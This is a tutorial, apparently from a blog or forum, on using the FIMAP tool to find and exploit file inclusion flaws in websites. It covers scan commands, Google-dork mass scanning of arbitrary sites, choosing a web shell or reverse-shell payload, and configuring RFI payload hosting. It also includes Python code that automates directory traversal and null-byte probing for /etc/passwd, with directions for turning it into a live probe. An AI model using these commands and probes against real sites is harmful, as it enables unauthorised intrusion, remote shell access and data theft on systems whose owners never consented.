Automated Local File Inclusion / Remote File Inclusion Scan and Exploit (FIMAP)


Today we are going to take a look at a tool called FIMAP. It is a Python-based tool built to automate LFI (Local File Inclusion) discovery and exploitation and to gain shell access on a target site. Hunting for LFI is much like hunting for SQL injection, only more time consuming, and sites that are straightforwardly vulnerable are getting harder to find. Crafting the requests by hand to find and confirm this class of bug is painstaking, which is why this tool is worth a look. It can run single-target scans, Google dork scans and list-file scans, and it can also crawl a site and write a list file of linked URLs for a follow-up scan. Ridiculous, right?

Pre-requisites:

  • Python installed on system already
  • A copy of FIMAP downloaded from its project page
  • Brain power & patience

OK, so assuming you already have Python installed, download the latest version of FIMAP from its Google Code home mentioned above, extract it to your desired location, and we can begin. Open your command prompt and navigate to the extraction point (unless you added the directory to your PATH). Type "fimap.py -h" to see a quick overview of the available options; it should look like this:

[Screenshot FIMAP-1: output of fimap.py -h]

 

It looks like a lot at first, but once you review it the syntax is easy to pick up, because most of the options and arguments are tied to whichever mode you are using. There are four basic modes: single scan, mass scan, Google scan and harvest mode. Single scan performs an LFI check and audit against a single URL. You supply the URL to scan, including the parameter you want tested, and it goes to work.

Code:

fimap.py -s -u "http://target-site.com/index2.php?x="

If you are only going to be scanning a single target site, I highly suggest you run harvest mode first to increase the chances of finding a vulnerable link. Point FIMAP at the root of the site in harvest mode and it will crawl it and write an output file that you can feed into a mass scan. It looks like this:

Code:

fimap.py -H -u "http://target-site.com/" -w output.txt

NOTE: you can set the crawl depth by adding the "-d <depth>" flag; the default is 1. A higher depth follows more levels of links and produces a larger list, so expect the mass scan that follows to take correspondingly longer.

Code:

fimap.py -H -u "http://target-site.com/" -d 3 -w output.txt

Now that we have our output file we can switch to mass scan mode and audit all of the links found by the harvest. You just point it at the "output.txt" file from the steps above and let it do its thing, like so:

Code:

fimap.py -m -l /path/to/list/output.txt
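A list file, whether it came out of harvest mode or was assembled by hand, usually contains links fimap cannot do anything with (no GET parameter) and near-duplicates that differ only in parameter values, which just multiply the scan time. The script below is an added example and is not part of fimap; it prunes such a list down to one URL per script and parameter set before you hand it to -l. The sample list and the host name are constructed for the example.

```python
"""Prune a harvest/list file before mass scanning (example code, not part of
fimap). The list below is constructed; real input is the file you pass to -l."""
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of what a harvested list can look like.
HARVESTED = """\
http://target-site.com/
http://target-site.com/index2.php?x=home
http://target-site.com/index2.php?x=about
http://target-site.com/index2.php?x=home&lang=en
http://target-site.com/contact.php
http://target-site.com/news.php?id=7
http://target-site.com/news.php?id=7
https://other-site.example/view.php?file=a.txt
"""


def dedupe_targets(text, same_host=None):
    """Keep one URL per (scheme, host, path, set of parameter names).

    Only URLs with a query string survive: fimap injects into GET parameters, so
    a bare path gives it nothing to test. Two URLs that differ only in parameter
    values hit the same server-side code and would just double the scan time.
    Pass same_host to stay in scope when the crawl followed off-site links."""
    seen, kept = set(), []
    for line in text.splitlines():
        url = line.strip()
        if not url:
            continue
        parts = urlsplit(url)
        if not parts.query:
            continue
        if same_host and parts.hostname != same_host:
            continue
        names = tuple(sorted(k for k, _ in parse_qsl(parts.query, keep_blank_values=True)))
        key = (parts.scheme, parts.netloc, parts.path, names)
        if key in seen:
            continue
        seen.add(key)
        kept.append(url)
    return kept


def write_list(kept, path="output.pruned.txt"):
    """Write the pruned list in the one-URL-per-line form that -l expects."""
    with open(path, "w") as fh:
        fh.write("\n".join(kept) + "\n")
    return path


if __name__ == "__main__":
    for url in dedupe_targets(HARVESTED, same_host="target-site.com"):
        print(url)
```

Run it against your own harvest output, then pass the pruned file to fimap.py -m -l. Keeping the first URL of each group (rather than the last) preserves the order the crawler found them in, which helps when you later read fimap's log alongside the list.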


[Screenshots FIMAP-2 and FIMAP-3: mass scan output]

If you prefer to run some large scans using Google and your favorite Google dorks, you can switch modes and use the following syntax (quote the query so the shell does not touch the "?" and "&" characters):

Code:

fimap.py -g -q "inurl:index2.php?x="

[Screenshot FIMAP-4: Google scan starting]

It runs much like mass scan mode until it reaches the end of the search results.

[Screenshot FIMAP-5: Google scan finishing]

NOTE: You can tune the Google scan further by setting the delay between Google requests with "--googlesleep=<milliseconds>" (a low value gets you rate-limited or captcha'd quickly) and the number of result pages to read with "-p <pages>". If you set the number of pages, you can also choose how many results each page returns with "--results=<10,25,50,100>"; 100 is the default. The full syntax looks like this:

Code:

fimap.py -g -q "inurl:index2.php?x=" --googlesleep=5000 -p 15 --results=50

Once your scans have run you will want to know where the results are stored. They go into two files, which you may need to search for on your system: fimap_results (XML) and fimap-log (text). These hold the stored results of all your scans. Their location depends on what type of system you are on, so use the run box or the locate command to find them. You can also run fimap with "-x" to get a list of the vulnerable targets found so far and pick one to exploit in an easy-to-follow interactive session:

Code:

fimap.py -x

[Screenshot FIMAP-6: exploit mode target list]

Simply choose the desired target by entering the number shown. Once a target is selected you get to choose which of its vulnerable links to try to exploit. It looks like this:

[Screenshot FIMAP-7: choosing the vulnerable link]

Once you choose the link you get to pick the payload. The default options are fimap's integrated shell, which runs commands through the vulnerable include on the target site, or a reverse shell that connects back to a NetCat listener on your own machine (start the listener before you choose that option). The fimap shell is not an interactive TTY, so you cannot drive interactive programs like SSH through it, but it is enough to gain a foothold for further escalation and rooting. Choose your payload, connect, and enjoy. Here is the end result of a successful exploit using the fimap shell:

[Screenshot FIMAP-8: commands run through the fimap shell]

You can also edit the configuration file to enable some additional features. Most notably you can add support for testing RFI (Remote File Inclusion) vulnerabilities. To do that, fimap needs somewhere to host its payload, so you enter the hosting details for your shell of choice into "config.py", save, and run a quick test to see that it works. The lines that need editing are the ones currently set to None below; I suggest the FTP mode if you have somewhere to host your shell. Whichever mode you use, the file path and the HTTP URL must point at the same file, because fimap writes the payload to the path and then includes it from the URL:

# FTP Mode
settings["dynamic_rfi"]["ftp"] = {}
settings["dynamic_rfi"]["ftp"]["ftp_host"] = None
settings["dynamic_rfi"]["ftp"]["ftp_user"] = None
settings["dynamic_rfi"]["ftp"]["ftp_pass"] = None
settings["dynamic_rfi"]["ftp"]["ftp_path"] = None  # A non existing file without suffix. Example: /home/imax/public_html/payload
settings["dynamic_rfi"]["ftp"]["http_map"] = None  # The mapped HTTP path of the file. Example: http://localhost/~imax/payload

# Local Mode
settings["dynamic_rfi"]["local"] = {}
settings["dynamic_rfi"]["local"]["local_path"] = None  # A non existing file on your filesystem without prefix which is reachable by http. Example: /var/www/payload
settings["dynamic_rfi"]["local"]["http_map"] = None  # The http url of the file without prefix where the file is reachable from the web. Example: http://localhost/payload

Here is the command to test your RFI configuration and confirm it will work when exploiting vulnerable links:

Code:

fimap.py --test-rfi

This covers the basic usage of FIMAP. The tool is still under development, so I encourage you to follow the project for updates. If you want to truly learn how LFI works, try the checks by hand after you have found a few with the tool's help: inject a bogus file name to read the include path out of the error message, count the "../" needed to climb out of it, and watch for the appended suffix that a null byte used to truncate.
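To make that manual process concrete, here is an added example (not fimap's code) that emulates, offline, the three checks fimap runs against an include parameter: learn the prefix and suffix from the PHP warning, build a traversal payload of the right depth, and fingerprint /etc/passwd in the response. The target, its fake filesystem, its warning text and the "pages/<name>.php" include layout are all constructed assumptions for the example; a hardened allow-list version is included to show what a negative result looks like.

```python
"""Toy emulation of the manual LFI checks that fimap automates (example code,
not part of fimap). The target, its filesystem and its error text are all
constructed here; nothing touches the network."""
import posixpath
import re

# Constructed fake target: a PHP page doing include("pages/" . $_GET['page'] . ".php").
INCLUDE_DIR = "/var/www/html/pages"   # assumed layout of the example target
SUFFIX = ".php"                        # appended by the vulnerable code
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    "/var/www/html/pages/home.php": "<h1>Home</h1>",
    "/var/www/html/pages/about.php": "<h1>About</h1>",
}


def vulnerable_include(page, null_byte_truncation=True):
    """Emulates the vulnerable include. null_byte_truncation=True mimics PHP
    before 5.3.4, where a %00 in the path cut off the appended suffix."""
    path = INCLUDE_DIR + "/" + page + SUFFIX
    if null_byte_truncation and "\x00" in path:
        path = path.split("\x00", 1)[0]
    path = posixpath.normpath(path)       # resolves the ../ traversal like the OS would
    if path in FAKE_FS:
        return FAKE_FS[path]
    # Verbose PHP warning: this is what leaks the include prefix and suffix.
    return ("Warning: include(%s): failed to open stream: No such file or directory "
            "in /var/www/html/index.php on line 3" % path)


def safe_include(page):
    """Hardened form: allow-list the page name instead of trusting the parameter."""
    allowed = {"home", "about"}
    if page in allowed:
        return FAKE_FS[INCLUDE_DIR + "/" + page + SUFFIX]
    return "Not found"                    # no path, no warning text to learn from


ERROR_RE = re.compile(r"include\((.*?)\): failed to open stream")
PASSWD_SIGNATURE = re.compile(r"root:x:0:0:")   # fimap-style file fingerprint


def learn_include_path(send):
    """Step 1: inject a bogus file name and read back the prefix/suffix the
    script wraps around the parameter (fimap reports this as path disclosure)."""
    marker = "fimap_probe_nonexistent"
    m = ERROR_RE.search(send(marker))
    if not m or marker not in m.group(1):
        return None
    prefix, suffix = m.group(1).split(marker, 1)
    return prefix, suffix                 # e.g. ("/var/www/html/pages/", ".php")


def build_payloads(prefix, suffix, target="/etc/passwd"):
    """Step 2: enough ../ to climb out of the include directory, plus a
    null-byte variant to drop the suffix when one is appended."""
    depth = prefix.rstrip("/").count("/")
    traversal = "../" * depth + target.lstrip("/")
    payloads = [traversal]
    if suffix:
        payloads.append(traversal + "\x00")   # sent on the wire as %00
    return payloads


def probe(send):
    """Step 3: fire the payloads and look for the /etc/passwd fingerprint.
    Returns the first working payload, or None if the parameter is not LFI."""
    learned = learn_include_path(send)
    if learned is None:
        return None
    prefix, suffix = learned
    for payload in build_payloads(prefix, suffix):
        if PASSWD_SIGNATURE.search(send(payload)):
            return payload
    return None


if __name__ == "__main__":
    print("old PHP, suffix appended:", repr(probe(vulnerable_include)))
    print("null byte fixed         :", probe(lambda p: vulnerable_include(p, False)))
    print("allow-listed include    :", probe(safe_include))
```

The `send` argument stands in for an HTTP GET with the parameter set; swap in a real request function (URL-encoding the payload) to turn this into a manual probe. Two caveats the example makes visible: with verbose errors disabled, step 1 yields nothing and you must guess the depth, and on a patched PHP the null byte no longer strips the suffix, so the same traversal that fails here would need another suffix-bypass or a file that already ends in the suffix.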

